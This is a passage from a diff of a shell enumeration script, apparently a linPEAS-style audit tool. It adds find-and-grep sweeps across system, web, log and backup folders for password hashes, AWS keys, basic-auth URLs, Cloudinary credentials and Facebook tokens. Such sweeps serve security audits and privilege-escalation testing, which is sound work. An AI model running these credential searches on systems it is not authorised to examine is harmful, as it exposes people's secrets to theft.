+ timeout 120 find /tmp -type f -exec grep -HnRIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+echo ''
+print_2title "Searching Raw Hashes"
+print_3title_no_nl "Searching sha512 (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+echo ''
+print_2title "Searching APIs"
+print_3title_no_nl "Searching AWS Client ID (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching AWS MWS Key (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching AWS Secret Key (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching Basic Auth Credentials (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching Cloudinary Basic Auth (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching Facebook Access Token (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching Facebook Client ID (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching Facebook Oauth (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
